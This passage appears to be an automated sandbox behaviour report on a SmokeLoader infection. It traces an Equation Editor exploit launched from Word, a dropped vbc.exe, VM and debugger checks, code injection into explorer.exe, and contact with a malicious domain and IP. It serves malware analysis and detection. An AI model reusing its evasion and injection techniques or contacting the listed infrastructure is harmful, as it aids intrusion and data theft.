Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskeng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskeng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskeng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rirjijj	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\Public\vbc.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\IDE	Jump to behavior
Source: C:\Users\Public\vbc.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\IDE	Jump to behavior
Source: C:\Users\Public\vbc.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\Public\vbc.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\Public\vbc.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\Public\vbc.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rirjijj	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\IDE
Source: C:\Users\user\AppData\Roaming\rirjijj	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\IDE
Source: C:\Users\user\AppData\Roaming\rirjijj	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\rirjijj	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\rirjijj	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\rirjijj	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI

Contains functionality to detect sleep reduction / modifications

Source: C:\Users\Public\vbc.exe	Code function: 5_2_0FA4BF50		5_2_0FA4BF50
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0FA4BF50		6_2_0FA4BF50

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2128	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2196	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 1944	Thread sleep count: 35 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 1940	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 1988	Thread sleep count: 584 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3200	Thread sleep count: 32 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3500	Thread sleep count: 87 > 30	Jump to behavior
Source: C:\Windows\System32\taskeng.exe TID: 3936	Thread sleep time: -120000s >= -30000s
Source: C:\Users\user\AppData\Roaming\rirjijj TID: 3888	Thread sleep time: -30000s >= -30000s
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1316	Thread sleep time: -420000s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 3580	Thread sleep time: -30000s >= -30000s

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\rirjijj	Last function: Thread delayed
Source: C:\Users\Public\vbc.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed

Source: C:\Windows\explorer.exe

Window / User API: threadDelayed 584

Jump to behavior

Source: C:\Users\Public\vbc.exe

API coverage: 1.1 %

Source: C:\Users\Public\vbc.exe

Code function: 6_2_0FA4BF50

6_2_0FA4BF50

Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rirjijj	Thread delayed: delay time: 30000
Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 30000

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	API call chain: ExitProcess graph end node	graph_2-455
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	API call chain: ExitProcess graph end node	graph_2-436
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	API call chain: ExitProcess graph end node	graph_2-503
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	API call chain: ExitProcess graph end node	graph_16-461

Source: explorer.exe, 00000009.00000002.1202387555.00000000043F0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: vbc.exe	Binary or memory string: \VMWare\
Source: explorer.exe, 00000009.00000002.1202387555.00000000043F0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: explorer.exe, 00000009.00000000.1027064494.000000000434F000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: scsi\disk&ven_vmware&prod_virtual_disk\5&22be343f&0&000000
Source: vbc.exe.2.dr	Binary or memory string: \VMWare\F\oracle\virtualbox guest additions\
Source: explorer.exe, 00000009.00000000.990983488.000000000037B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.08tp
Source: explorer.exe, 00000009.00000002.1202387555.0000000004423000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000009.00000002.1202387555.00000000043F0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: v6nel\5&35c44269e\cdromnvmware_sata_
Source: explorer.exe, 00000009.00000000.1027064494.000000000434F000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0Q
Source: explorer.exe, 00000009.00000002.1195305052.0000000000335000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}(

Source: C:\Users\Public\vbc.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 18_2_000C6320 GetSystemInfo,

18_2_000C6320

Source: C:\Windows\SysWOW64\explorer.exe	Code function: 18_2_000C3CE7 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose,	18_2_000C3CE7
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 18_2_000C1EBA FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose,	18_2_000C1EBA
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 18_2_000C2C85 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,	18_2_000C2C85

Source: C:\Users\Public\vbc.exe

System information queried: ModuleInformation

Jump to behavior

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\Public\vbc.exe	System information queried: CodeIntegrityInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\rirjijj	System information queried: CodeIntegrityInformation

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 18_2_001291C9 LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,

18_2_001291C9

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_036804AF mov edx, dword ptr fs:[00000030h]	2_2_036804AF
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0FA32B8C mov eax, dword ptr fs:[00000030h]	5_2_0FA32B8C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0FA32B06 mov eax, dword ptr fs:[00000030h]	5_2_0FA32B06
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0FA32B63 mov eax, dword ptr fs:[00000030h]	5_2_0FA32B63
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0FA32B78 mov eax, dword ptr fs:[00000030h]	5_2_0FA32B78
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0FA32E60 mov eax, dword ptr fs:[00000030h]	5_2_0FA32E60
Source: C:\Users\Public\vbc.exe	Code function: 5_2_001F2CA6 mov eax, dword ptr fs:[00000030h]	5_2_001F2CA6
Source: C:\Users\Public\vbc.exe	Code function: 5_2_001F6C1A mov eax, dword ptr fs:[00000030h]	5_2_001F6C1A
Source: C:\Users\Public\vbc.exe	Code function: 5_2_001F682F mov eax, dword ptr fs:[00000030h]	5_2_001F682F
Source: C:\Users\Public\vbc.exe	Code function: 5_2_001F68C8 mov eax, dword ptr fs:[00000030h]	5_2_001F68C8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_001F7248 mov ecx, dword ptr fs:[00000030h]	5_2_001F7248
Source: C:\Users\Public\vbc.exe	Code function: 5_2_001F3277 mov eax, dword ptr fs:[00000030h]	5_2_001F3277
Source: C:\Users\Public\vbc.exe	Code function: 5_2_001F6AA6 mov eax, dword ptr fs:[00000030h]	5_2_001F6AA6
Source: C:\Users\Public\vbc.exe	Code function: 5_2_001F6EA0 mov eax, dword ptr fs:[00000030h]	5_2_001F6EA0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_001F6BFB mov eax, dword ptr fs:[00000030h]	5_2_001F6BFB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0FA32B8C mov eax, dword ptr fs:[00000030h]	6_2_0FA32B8C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0FA32B06 mov eax, dword ptr fs:[00000030h]	6_2_0FA32B06
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0FA32B63 mov eax, dword ptr fs:[00000030h]	6_2_0FA32B63
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0FA32B78 mov eax, dword ptr fs:[00000030h]	6_2_0FA32B78
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0FA32E60 mov eax, dword ptr fs:[00000030h]	6_2_0FA32E60
Source: C:\Users\user\AppData\Roaming\rirjijj	Code function: 15_2_00312CA6 mov eax, dword ptr fs:[00000030h]	15_2_00312CA6
Source: C:\Users\user\AppData\Roaming\rirjijj	Code function: 15_2_0031682F mov eax, dword ptr fs:[00000030h]	15_2_0031682F
Source: C:\Users\user\AppData\Roaming\rirjijj	Code function: 15_2_00316C1A mov eax, dword ptr fs:[00000030h]	15_2_00316C1A
Source: C:\Users\user\AppData\Roaming\rirjijj	Code function: 15_2_003168C8 mov eax, dword ptr fs:[00000030h]	15_2_003168C8
Source: C:\Users\user\AppData\Roaming\rirjijj	Code function: 15_2_00313277 mov eax, dword ptr fs:[00000030h]	15_2_00313277
Source: C:\Users\user\AppData\Roaming\rirjijj	Code function: 15_2_00317248 mov ecx, dword ptr fs:[00000030h]	15_2_00317248
Source: C:\Users\user\AppData\Roaming\rirjijj	Code function: 15_2_00316EA0 mov eax, dword ptr fs:[00000030h]	15_2_00316EA0
Source: C:\Users\user\AppData\Roaming\rirjijj	Code function: 15_2_00316AA6 mov eax, dword ptr fs:[00000030h]	15_2_00316AA6
Source: C:\Users\user\AppData\Roaming\rirjijj	Code function: 15_2_00316BFB mov eax, dword ptr fs:[00000030h]	15_2_00316BFB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 16_2_037004AF mov edx, dword ptr fs:[00000030h]	16_2_037004AF
Source: C:\Users\Public\vbc.exe	Code function: 19_2_00252CA6 mov eax, dword ptr fs:[00000030h]	19_2_00252CA6
Source: C:\Users\Public\vbc.exe	Code function: 19_2_0025682F mov eax, dword ptr fs:[00000030h]	19_2_0025682F
Source: C:\Users\Public\vbc.exe	Code function: 19_2_00256C1A mov eax, dword ptr fs:[00000030h]	19_2_00256C1A
Source: C:\Users\Public\vbc.exe	Code function: 19_2_002568C8 mov eax, dword ptr fs:[00000030h]	19_2_002568C8
Source: C:\Users\Public\vbc.exe	Code function: 19_2_00253277 mov eax, dword ptr fs:[00000030h]	19_2_00253277
Source: C:\Users\Public\vbc.exe	Code function: 19_2_00257248 mov ecx, dword ptr fs:[00000030h]	19_2_00257248
Source: C:\Users\Public\vbc.exe	Code function: 19_2_00256AA6 mov eax, dword ptr fs:[00000030h]	19_2_00256AA6
Source: C:\Users\Public\vbc.exe	Code function: 19_2_00256EA0 mov eax, dword ptr fs:[00000030h]	19_2_00256EA0
Source: C:\Users\Public\vbc.exe	Code function: 19_2_00256BFB mov eax, dword ptr fs:[00000030h]	19_2_00256BFB

Source: C:\Users\Public\vbc.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\AppData\Roaming\rirjijj	Process queried: DebugPort

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 18_2_000C1000 GetProcessHeap,RtlAllocateHeap,

18_2_000C1000

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\explorer.exe	Domain query: dropbuyinc.ga
Source: C:\Windows\SysWOW64\explorer.exe	Network Connect: 23.230.13.96 80

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: rirjijj.9.dr

Jump to dropped file

Maps a DLL or memory area into another process

Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Users\Public\vbc.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rirjijj	Section loaded: unknown target: C:\Users\user\AppData\Roaming\rirjijj protection: execute and read and write
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Users\Public\vbc.exe protection: execute and read and write
Source: C:\Users\user\AppData\Roaming\rirjijj	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Roaming\rirjijj	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read

Creates a thread in another existing process (thread injection)

Source: C:\Users\Public\vbc.exe	Thread created: C:\Windows\explorer.exe EIP: 2931930			Jump to behavior
Source: C:\Users\user\AppData\Roaming\rirjijj	Thread created: unknown EIP: 28C1930

Writes to foreign memory regions

Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: BD102D	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: BD102D	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: BD102D	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: BD102D	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: BD102D	Jump to behavior

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\explorer.exe	Memory written: PID: 3872 base: BD102D value: 90	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: PID: 3776 base: FF06B794 value: 90	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: PID: 3724 base: BD102D value: 90	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: PID: 3812 base: BD102D value: 90	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: PID: 4020 base: FF06B794 value: 90	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: PID: 3432 base: BD102D value: 90	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: PID: 3532 base: FF06B794 value: 90	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: PID: 1492 base: BD102D value: 90	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: PID: 1796 base: FF06B794 value: 90	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Users\user\AppData\Roaming\rirjijj C:\Users\user\AppData\Roaming\rirjijj
Source: C:\Users\user\AppData\Roaming\rirjijj	Process created: C:\Users\user\AppData\Roaming\rirjijj C:\Users\user\AppData\Roaming\rirjijj
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe

Source: explorer.exe, 00000009.00000002.1197229578.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.992643295.0000000000830000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000009.00000002.1197229578.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.992643295.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.990983488.0000000000335000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000009.00000002.1197229578.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.992643295.0000000000830000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager<

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 18_2_001153FB cpuid

18_2_001153FB

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 18_2_000C2282 GetSystemTimeAsFileTime,_alldiv,wsprintfA,

18_2_000C2282

Source: C:\Windows\explorer.exe

Code function: 9_2_02933518 GetUserNameW,

9_2_02933518

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 18_2_000C2308 RtlZeroMemory,GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlCompareMemory,RtlCompareMemory,StrStrIW,FreeLibrary,

18_2_000C2308

Stealing of Sensitive Information

Yara detected SmokeLoader

Source: Yara match	File source: 0000001A.00000002.1194343464.0000000000081000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.1194283601.0000000000061000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3432, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3532, type: MEMORYSTR
Source: Yara match	File source: 00000006.00000002.1061822794.0000000000300000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
